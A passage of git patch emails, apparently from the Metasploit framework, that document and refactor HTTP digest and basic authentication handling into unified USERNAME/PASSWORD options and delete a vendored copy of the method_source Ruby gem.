Feb 2013 18:48:03 -0600 Subject: [PATCH 029/139] Some more YARD docs --- lib/rex/proto/http/client.rb | 17 +++-------------- 1 file changed, 3 insertions(+), 14 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 66a4780618..132c7cdaf0 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -383,20 +383,9 @@ class Client auth_str = "Basic " + Rex::Text.encode_base64(auth_str) end - - # - # Opts - - # Inherits all the same options as send_request_cgi - # Also expects some specific opts - # DigestAuthUser - The username for DigestAuth - # DigestAuthPass - The password for DigestAuth - # DigestAuthIIS - IIS uses a slighlty different implementation, set this for IIS support - # - # This method builds new request to complete a Digest Authentication cycle. - # We do not persist the original connection , to clear state in preparation for our auth - # We do persist the rest of the connection stream because Digest is a tcp session - # based authentication method. - # + # Send a series of requests to complete Digest Authentication + # @param opts [Hash] the options used to build an HTTP request + # @return [Response] the last valid HTTP response we received def digest_auth(opts={}) @nonce_count = 0 From dac11474735f77b1b301a6ef5a6d01643f5ee30e Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 19:41:42 -0600 Subject: [PATCH 030/139] merge client config into opts --- lib/rex/proto/http/client.rb | 8 ++++++-- lib/rex/proto/http/client_request.rb | 4 ++-- 2 files changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 132c7cdaf0..46bfffcc86 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -186,11 +186,13 @@ class Client opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' opts['version'] = opts['version'] || config['version'] || '1.1' + opts['client_config'] = self.config + if opts['basic_auth'] and not opts['authorization'] opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - req = ClientRequest.new(self.config,opts) + req = ClientRequest.new(opts) end @@ -226,6 +228,8 @@ class Client opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' opts['version'] = opts['version'] || config['version'] || '1.1' + opts['client_config'] = self.config + if opts['encode_params'] == true or opts['encode_params'].nil? opts['encode_params'] = true else @@ -236,7 +240,7 @@ class Client opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - req = ClientRequest.new(self.config,opts) + req = ClientRequest.new(opts) end # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 8af865bde1..9c87834499 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -34,9 +34,9 @@ class ClientRequest attr_reader :opts - def initialize(client_config,opts={}) + def initialize(opts={}) @cgi = opts['cgi'] - @config = client_config + @config = opts['client_config'] @connection = opts['connection'] @content_type = opts['ctype'] @cookie = opts['cookie'] From b2563dd6c27a06123be1c341003f1093175b7dc6 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 21:25:37 -0600 Subject: [PATCH 031/139] trying to clean up the mess from the revert --- lib/anemone/rex_http.rb | 4 +- .../1.9.1/gems/method_source-0.7.1/.gemtest | 0 .../gems/method_source-0.7.1/.travis.yml | 17 -- .../1.9.1/gems/method_source-0.7.1/.yardopts | 1 - .../1.9.1/gems/method_source-0.7.1/Gemfile | 2 - .../1.9.1/gems/method_source-0.7.1/LICENSE | 25 -- .../gems/method_source-0.7.1/README.markdown | 91 ------ .../1.9.1/gems/method_source-0.7.1/Rakefile | 76 ----- .../method_source-0.7.1/lib/method_source.rb | 163 ----------- .../lib/method_source/source_location.rb | 138 --------- .../lib/method_source/version.rb | 3 - .../method_source-0.7.1/method_source.gemspec | 33 --- .../gems/method_source-0.7.1/test/test.rb | 122 -------- .../method_source-0.7.1/test/test_helper.rb | 50 ---- lib/msf/core/auxiliary/crawler.rb | 14 +- lib/msf/core/auxiliary/web/http.rb | 13 +- lib/msf/core/exploit/http/client.rb | 265 ++---------------- lib/rex/proto/http/client.rb | 28 +- 18 files changed, 65 insertions(+), 980 deletions(-) delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb diff --git a/lib/anemone/rex_http.rb b/lib/anemone/rex_http.rb index ce6a71a17f..f606f289fc 100644 --- a/lib/anemone/rex_http.rb +++ b/lib/anemone/rex_http.rb @@ -188,7 +188,9 @@ module Anemone context, url.scheme == "https", 'SSLv23', - @opts[:proxies] + @opts[:proxies], + @opts[:username], + @opts[:password] ) conn.set_config( diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest deleted file mode 100644 index e69de29bb2..0000000000 diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml deleted file mode 100644 index ba51bba6b2..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml +++ /dev/null @@ -1,17 +0,0 @@ -rvm: - - 1.8.7 - - 1.9.2 - - 1.9.3 - - ree - - rbx-18mode - - rbx-19mode - - jruby - -notifications: - irc: "irc.freenode.org#pry" - recipients: - - jrmair@gmail.com - -branches: - only: - - master diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts deleted file mode 100644 index a4e7838016..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts +++ /dev/null @@ -1 +0,0 @@ --m markdown diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile deleted file mode 100644 index e45e65f871..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile +++ /dev/null @@ -1,2 +0,0 @@ -source :rubygems -gemspec diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE deleted file mode 100644 index d1a50d62d0..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE +++ /dev/null @@ -1,25 +0,0 @@ -License -------- - -(The MIT License) - -Copyright (c) 2011 John Mair (banisterfiend) - -Permission is hereby granted, free of charge, to any person obtaining -a copy of this software and associated documentation files (the -'Software'), to deal in the Software without restriction, including -without limitation the rights to use, copy, modify, merge, publish, -distribute, sublicense, and/or sell copies of the Software, and to -permit persons to whom the Software is furnished to do so, subject to -the following conditions: - -The above copyright notice and this permission notice shall be -included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, -EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. -IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY -CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, -TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown deleted file mode 100644 index d91b810a3b..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown +++ /dev/null @@ -1,91 +0,0 @@ -method_source -============= - -(C) John Mair (banisterfiend) 2011 - -_retrieve the sourcecode for a method_ - -*NOTE:* This simply utilizes `Method#source_location`; it - does not access the live AST. - -`method_source` is a utility to return a method's sourcecode as a -Ruby string. Also returns `Proc` and `Lambda` sourcecode. - -Method comments can also be extracted using the `comment` method. - -It is written in pure Ruby (no C). - -* Some Ruby 1.8 support now available. -* Support for MRI, RBX, JRuby, REE - -`method_source` provides the `source` and `comment` methods to the `Method` and -`UnboundMethod` and `Proc` classes. - -* Install the [gem](https://rubygems.org/gems/method_source): `gem install method_source` -* Read the [documentation](http://rdoc.info/github/banister/method_source/master/file/README.markdown) -* See the [source code](http://github.com/banister/method_source) - -Example: display method source ------------------------------- - - Set.instance_method(:merge).source.display - # => - def merge(enum) - if enum.instance_of?(self.class) - @hash.update(enum.instance_variable_get(:@hash)) - else - do_with_enum(enum) { |o| add(o) } - end - - self - end - -Example: display method comments --------------------------------- - - Set.instance_method(:merge).comment.display - # => - # Merges the elements of the given enumerable object to the set and - # returns self. - -Limitations: ------------- - -* Occasional strange behaviour in Ruby 1.8 -* Cannot return source for C methods. -* Cannot return source for dynamically defined methods. - -Special Thanks --------------- - -[Adam Sanderson](https://github.com/adamsanderson) for `comment` functionality. - -[Dmitry Elastic](https://github.com/dmitryelastic) for the brilliant Ruby 1.8 `source_location` hack. - -[Samuel Kadolph](https://github.com/samuelkadolph) for the JRuby 1.8 `source_location`. - -License -------- - -(The MIT License) - -Copyright (c) 2011 John Mair (banisterfiend) - -Permission is hereby granted, free of charge, to any person obtaining -a copy of this software and associated documentation files (the -'Software'), to deal in the Software without restriction, including -without limitation the rights to use, copy, modify, merge, publish, -distribute, sublicense, and/or sell copies of the Software, and to -permit persons to whom the Software is furnished to do so, subject to -the following conditions: - -The above copyright notice and this permission notice shall be -included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, -EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. -IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY -CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, -TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile deleted file mode 100644 index 92c0234f3b..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile +++ /dev/null @@ -1,76 +0,0 @@ -dlext = Config::CONFIG['DLEXT'] -direc = File.dirname(__FILE__) - -require 'rake/clean' -require 'rake/gempackagetask' -require "#{direc}/lib/method_source/version" - -CLOBBER.include("**/*.#{dlext}", "**/*~", "**/*#*", "**/*.log", "**/*.o") -CLEAN.include("ext/**/*.#{dlext}", "ext/**/*.log", "ext/**/*.o", - "ext/**/*~", "ext/**/*#*", "ext/**/*.obj", "**/*.rbc", - "ext/**/*.def", "ext/**/*.pdb", "**/*_flymake*.*", "**/*_flymake") - -def apply_spec_defaults(s) - s.name = "method_source" - s.summary = "retrieve the sourcecode for a method" - s.version = MethodSource::VERSION - s.date = Time.now.strftime '%Y-%m-%d' - s.author = "John Mair (banisterfiend)" - s.email = 'jrmair@gmail.com' - s.description = s.summary - s.require_path = 'lib' - - s.add_development_dependency("bacon","~>1.1.0") - s.add_development_dependency("rake", "~>0.9") - s.homepage = "http://banisterfiend.wordpress.com" - s.has_rdoc = 'yard' - s.files = `git ls-files`.split("\n") - s.test_files = `git ls-files -- test/*`.split("\n") -end - -task :test do - sh "bacon -q #{direc}/test/test.rb" -end - -desc "reinstall gem" -task :reinstall => :gems do - sh "gem uninstall method_source" rescue nil - sh "gem install #{direc}/pkg/method_source-#{MethodSource::VERSION}.gem" -end - -desc "Set up and run tests" -task :default => [:test] - -namespace :ruby do - spec = Gem::Specification.new do |s| - apply_spec_defaults(s) - s.platform = Gem::Platform::RUBY - end - - Rake::GemPackageTask.new(spec) do |pkg| - pkg.need_zip = false - pkg.need_tar = false - end - - desc "Generate gemspec file" - task :gemspec do - File.open("#{spec.name}.gemspec", "w") do |f| - f << spec.to_ruby - end - end -end - -desc "build all platform gems at once" -task :gems => [:rmgems, "ruby:gem"] - -desc "remove all platform gems" -task :rmgems => ["ruby:clobber_package"] - -desc "build and push latest gems" -task :pushgems => :gems do - chdir("#{direc}/pkg") do - Dir["*.gem"].each do |gemfile| - sh "gem push #{gemfile}" - end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb deleted file mode 100644 index 9a3c325f75..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb +++ /dev/null @@ -1,163 +0,0 @@ -# (C) John Mair (banisterfiend) 2011 -# MIT License - -direc = File.dirname(__FILE__) - -require "#{direc}/method_source/version" -require "#{direc}/method_source/source_location" - -module MethodSource - # Determine if a string of code is a valid Ruby expression. - # @param [String] code The code to validate. - # @return [Boolean] Whether or not the code is a valid Ruby expression. - # @example - # valid_expression?("class Hello") #=> false - # valid_expression?("class Hello; end") #=> true - def self.valid_expression?(str) - if defined?(Rubinius::Melbourne19) && RUBY_VERSION =~ /^1\.9/ - Rubinius::Melbourne19.parse_string(str) - elsif defined?(Rubinius::Melbourne) - Rubinius::Melbourne.parse_string(str) - else - catch(:valid) { - eval("BEGIN{throw :valid}\n#{str}") - } - end - true - rescue SyntaxError - false - end - - # Helper method responsible for extracting method body. - # Defined here to avoid polluting `Method` class. - # @param [Array] source_location The array returned by Method#source_location - # @return [File] The opened source file - def self.source_helper(source_location) - return nil if !source_location.is_a?(Array) - - file_name, line = source_location - File.open(file_name) do |file| - (line - 1).times { file.readline } - - code = "" - loop do - val = file.readline - code << val - - return code if valid_expression?(code) - end - end - end - - # Helper method responsible for opening source file and buffering up - # the comments for a specified method. Defined here to avoid polluting - # `Method` class. - # @param [Array] source_location The array returned by Method#source_location - # @return [String] The comments up to the point of the method. - def self.comment_helper(source_location) - return nil if !source_location.is_a?(Array) - - file_name, line = source_location - File.open(file_name) do |file| - buffer = "" - (line - 1).times do - line = file.readline - # Add any line that is a valid ruby comment, - # but clear as soon as we hit a non comment line. - if (line =~ /^\s*#/) || (line =~ /^\s*$/) - buffer << line.lstrip - else - buffer.replace("") - end - end - - buffer - end - end - - # This module is to be included by `Method` and `UnboundMethod` and - # provides the `#source` functionality - module MethodExtensions - - # We use the included hook to patch Method#source on rubinius. - # We need to use the included hook as Rubinius defines a `source` - # on Method so including a module will have no effect (as it's - # higher up the MRO). - # @param [Class] klass The class that includes the module. - def self.included(klass) - if klass.method_defined?(:source) && Object.const_defined?(:RUBY_ENGINE) && - RUBY_ENGINE =~ /rbx/ - - klass.class_eval do - orig_source = instance_method(:source) - - define_method(:source) do - begin - super - rescue - orig_source.bind(self).call - end - end - - end - end - end - - # Return the sourcecode for the method as a string - # (This functionality is only supported in Ruby 1.9 and above) - # @return [String] The method sourcecode as a string - # @example - # Set.instance_method(:clear).source.display - # => - # def clear - # @hash.clear - # self - # end - def source - if respond_to?(:source_location) - source = MethodSource.source_helper(source_location) - - raise "Cannot locate source for this method: #{name}" if !source - else - raise "#{self.class}#source not supported by this Ruby version (#{RUBY_VERSION})" - end - - source - end - - # Return the comments associated with the method as a string. - # (This functionality is only supported in Ruby 1.9 and above) - # @return [String] The method's comments as a string - # @example - # Set.instance_method(:clear).comment.display - # => - # # Removes all elements and returns self. - def comment - if respond_to?(:source_location) - comment = MethodSource.comment_helper(source_location) - - raise "Cannot locate source for this method: #{name}" if !comment - else - raise "#{self.class}#comment not supported by this Ruby version (#{RUBY_VERSION})" - end - - comment - end - end -end - -class Method - include MethodSource::SourceLocation::MethodExtensions - include MethodSource::MethodExtensions -end - -class UnboundMethod - include MethodSource::SourceLocation::UnboundMethodExtensions - include MethodSource::MethodExtensions -end - -class Proc - include MethodSource::SourceLocation::ProcExtensions - include MethodSource::MethodExtensions -end - diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb deleted file mode 100644 index 9161854819..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb +++ /dev/null @@ -1,138 +0,0 @@ -module MethodSource - module ReeSourceLocation - # Ruby enterprise edition provides all the information that's - # needed, in a slightly different way. - def source_location - [__file__, __line__] rescue nil - end - end - - module SourceLocation - module MethodExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ - require 'java' - - # JRuby version source_location hack - # @return [Array] A two element array containing the source location of the method - def source_location - to_java.source_location(Thread.current.to_java.getContext()) - end - else - - - def trace_func(event, file, line, id, binding, classname) - return unless event == 'call' - set_trace_func nil - - @file, @line = file, line - raise :found - end - - private :trace_func - - # Return the source location of a method for Ruby 1.8. - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # method definition is found. - def source_location - if @file.nil? - args =[*(1..(arity<-1 ? -arity-1 : arity ))] - - set_trace_func method(:trace_func).to_proc - call(*args) rescue nil - set_trace_func nil - @file = File.expand_path(@file) if @file && File.exist?(File.expand_path(@file)) - end - return [@file, @line] if File.exist?(@file.to_s) - end - end - end - - module ProcExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ - - # Return the source location for a Proc (Rubinius only) - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # proc definition is found. - def source_location - [block.file.to_s, block.line] - end - else - - # Return the source location for a Proc (in implementations - # without Proc#source_location) - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # proc definition is found. - def source_location - self.to_s =~ /@(.*):(\d+)/ - [$1, $2.to_i] - end - end - end - - module UnboundMethodExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ - require 'java' - - # JRuby version source_location hack - # @return [Array] A two element array containing the source location of the method - def source_location - to_java.source_location(Thread.current.to_java.getContext()) - end - - else - - - # Return the source location of an instance method for Ruby 1.8. - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # method definition is found. - def source_location - klass = case owner - when Class - owner - when Module - method_owner = owner - Class.new { include(method_owner) } - end - - # deal with immediate values - case - when klass == Symbol - return :a.method(name).source_location - when klass == Fixnum - return 0.method(name).source_location - when klass == TrueClass - return true.method(name).source_location - when klass == FalseClass - return false.method(name).source_location - when klass == NilClass - return nil.method(name).source_location - end - - begin - Object.instance_method(:method).bind(klass.allocate).call(name).source_location - rescue TypeError - - # Assume we are dealing with a Singleton Class: - # 1. Get the instance object - # 2. Forward the source_location lookup to the instance - instance ||= ObjectSpace.each_object(owner).first - Object.instance_method(:method).bind(instance).call(name).source_location - end - end - end - end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb deleted file mode 100644 index b8142bfaef..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb +++ /dev/null @@ -1,3 +0,0 @@ -module MethodSource - VERSION = "0.7.1" -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec deleted file mode 100644 index 83a727d6f6..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec +++ /dev/null @@ -1,33 +0,0 @@ -# -*- encoding: utf-8 -*- - -Gem::Specification.new do |s| - s.name = "method_source" - s.version = "0.7.0" - - s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= - s.authors = ["John Mair (banisterfiend)"] - s.date = "2012-01-01" - s.description = "retrieve the sourcecode for a method" - s.email = "jrmair@gmail.com" - s.files = [".gemtest", ".travis.yml", ".yardopts", "Gemfile", "LICENSE", "README.markdown", "Rakefile", "lib/method_source.rb", "lib/method_source/source_location.rb", "lib/method_source/version.rb", "method_source.gemspec", "test/test.rb", "test/test_helper.rb"] - s.homepage = "http://banisterfiend.wordpress.com" - s.require_paths = ["lib"] - s.rubygems_version = "1.8.10" - s.summary = "retrieve the sourcecode for a method" - s.test_files = ["test/test.rb", "test/test_helper.rb"] - - if s.respond_to? :specification_version then - s.specification_version = 3 - - if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then - s.add_development_dependency(%q, ["~> 1.1.0"]) - s.add_development_dependency(%q, ["~> 0.9"]) - else - s.add_dependency(%q, ["~> 1.1.0"]) - s.add_dependency(%q, ["~> 0.9"]) - end - else - s.add_dependency(%q, ["~> 1.1.0"]) - s.add_dependency(%q, ["~> 0.9"]) - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb deleted file mode 100644 index 425e56acf9..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb +++ /dev/null @@ -1,122 +0,0 @@ -direc = File.dirname(__FILE__) - -require 'rubygems' -require 'bacon' -require "#{direc}/../lib/method_source" -require "#{direc}/test_helper" - -describe MethodSource do - - describe "source_location (testing 1.8 implementation)" do - it 'should return correct source_location for a method' do - method(:hello).source_location.first.should =~ /test_helper/ - end - - it 'should not raise for immediate instance methods' do - [Symbol, Fixnum, TrueClass, FalseClass, NilClass].each do |immediate_class| - lambda { immediate_class.instance_method(:to_s).source_location }.should.not.raise - end - end - - it 'should not raise for immediate methods' do - [:a, 1, true, false, nil].each do |immediate| - lambda { immediate.method(:to_s).source_location }.should.not.raise - end - end - end - - before do - @hello_module_source = " def hello; :hello_module; end\n" - @hello_singleton_source = "def $o.hello; :hello_singleton; end\n" - @hello_source = "def hello; :hello; end\n" - @hello_comment = "# A comment for hello\n# It spans two lines and is indented by 2 spaces\n" - @lambda_comment = "# This is a comment for MyLambda\n" - @lambda_source = "MyLambda = lambda { :lambda }\n" - @proc_source = "MyProc = Proc.new { :proc }\n" - end - - it 'should define methods on Method and UnboundMethod and Proc' do - Method.method_defined?(:source).should == true - UnboundMethod.method_defined?(:source).should == true - Proc.method_defined?(:source).should == true - end - - describe "Methods" do - it 'should return source for method' do - method(:hello).source.should == @hello_source - end - - it 'should return source for a method defined in a module' do - M.instance_method(:hello).source.should == @hello_module_source - end - - it 'should return source for a singleton method as an instance method' do - class << $o; self; end.instance_method(:hello).source.should == @hello_singleton_source - end - - it 'should return source for a singleton method' do - $o.method(:hello).source.should == @hello_singleton_source - end - - - it 'should return a comment for method' do - method(:hello).comment.should == @hello_comment - end - - - if !is_rbx? - it 'should raise for C methods' do - lambda { method(:puts).source }.should.raise RuntimeError - end - end - end - - # if RUBY_VERSION =~ /1.9/ || is_rbx? - describe "Lambdas and Procs" do - it 'should return source for proc' do - MyProc.source.should == @proc_source - end - - it 'should return an empty string if there is no comment' do - MyProc.comment.should == '' - end - - it 'should return source for lambda' do - MyLambda.source.should == @lambda_source - end - - it 'should return comment for lambda' do - MyLambda.comment.should == @lambda_comment - end - end - # end - describe "Comment tests" do - before do - @comment1 = "# a\n# b\n" - @comment2 = "# a\n# b\n" - @comment3 = "# a\n#\n# b\n" - @comment4 = "# a\n# b\n" - @comment5 = "# a\n# b\n# c\n# d\n" - end - - it "should correctly extract multi-line comments" do - method(:comment_test1).comment.should == @comment1 - end - - it "should correctly strip leading whitespace before comments" do - method(:comment_test2).comment.should == @comment2 - end - - it "should keep empty comment lines" do - method(:comment_test3).comment.should == @comment3 - end - - it "should ignore blank lines between comments" do - method(:comment_test4).comment.should == @comment4 - end - - it "should align all comments to same indent level" do - method(:comment_test5).comment.should == @comment5 - end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb deleted file mode 100644 index 53da4e519c..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb +++ /dev/null @@ -1,50 +0,0 @@ -def is_rbx? - defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ -end - -def jruby? - defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ -end - - -module M - def hello; :hello_module; end -end - -$o = Object.new -def $o.hello; :hello_singleton; end - -# A comment for hello - - # It spans two lines and is indented by 2 spaces -def hello; :hello; end - -# a -# b -def comment_test1; end - - # a - # b -def comment_test2; end - -# a -# -# b -def comment_test3; end - -# a - -# b -def comment_test4; end - - -# a - # b - # c -# d -def comment_test5; end - -# This is a comment for MyLambda -MyLambda = lambda { :lambda } -MyProc = Proc.new { :proc } - diff --git a/lib/msf/core/auxiliary/crawler.rb b/lib/msf/core/auxiliary/crawler.rb index 36e963ecbc..168a130d5b 100644 --- a/lib/msf/core/auxiliary/crawler.rb +++ b/lib/msf/core/auxiliary/crawler.rb @@ -22,7 +22,9 @@ module Auxiliary::HttpCrawler Opt::Proxies, OptInt.new('MAX_PAGES', [ true, 'The maximum number of pages to crawl per URL', 500]), OptInt.new('MAX_MINUTES', [ true, 'The maximum number of minutes to spend on each URL', 5]), - OptInt.new('MAX_THREADS', [ true, 'The maximum number of concurrent requests', 4]) + OptInt.new('MAX_THREADS', [ true, 'The maximum number of concurrent requests', 4]), + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication']) ], self.class ) @@ -118,8 +120,9 @@ module Auxiliary::HttpCrawler :info => "" }) - if datastore['BasicAuthUser'] - t[:http_basic_auth] = [ "#{datastore['BasicAuthUser']}:#{datastore['BasicAuthPass']}" ].pack("m*").gsub(/\s+/, '') + if datastore['USERNAME'] and datastore['USERNAME'] != '' + t[:username] = datastore['USERNAME'].to_s + t[:password] = datastore['PASSWORD'].to_s end if datastore['HTTPCookie'] @@ -278,9 +281,8 @@ module Auxiliary::HttpCrawler opts[:cookies] = t[:cookies] end - if t[:http_basic_auth] - opts[:http_basic_auth] = t[:http_basic_auth] - end + opts[:username] = t[:username] || '' + opts[:password] =t[:password] || '' opts end diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index a7c8fc86e3..2ad3dbcb19 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -69,6 +69,7 @@ class Auxiliary::Web::HTTP attr_reader :framework attr_accessor :redirect_limit + attr_accessor :username , :password def initialize( opts = {} ) @opts = opts.dup @@ -84,8 +85,8 @@ class Auxiliary::Web::HTTP @request_opts = {} if opts[:auth].is_a? Hash - @request_opts['basic_auth'] = [ opts[:auth][:user].to_s + ':' + - opts[:auth][:password] ]. pack( 'm*' ).gsub( /\s+/, '' ) + @username = opts[:auth][:user].to_s + @password = opts[:auth][:password].to_s end self.redirect_limit = opts[:redirect_limit] || 20 @@ -105,7 +106,9 @@ class Auxiliary::Web::HTTP opts[:target].port, {}, opts[:target].ssl, - 'SSLv23' + 'SSLv23', + username, + password ) c.set_config({ @@ -296,6 +299,10 @@ class Auxiliary::Web::HTTP opts['data'] = body if body c = connect + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout ) rescue ::Timeout::Error Response.timed_out diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 6d0bd9336b..5d8a48891e 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -46,10 +46,8 @@ module Exploit::Remote::HttpClient OptString.new('UserAgent', [false, 'The User-Agent header to use for all requests', Rex::Proto::Http::Client::DefaultUserAgent ]), - OptString.new('BasicAuthUser', [false, 'The HTTP username to specify for basic authentication']), - OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']), - OptString.new('DigestAuthUser', [false, 'The HTTP username to specify for digest authentication']), - OptString.new('DigestAuthPassword', [false, 'The HTTP password to specify for digest authentication']), + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]), OptBool.new('SSL', [ 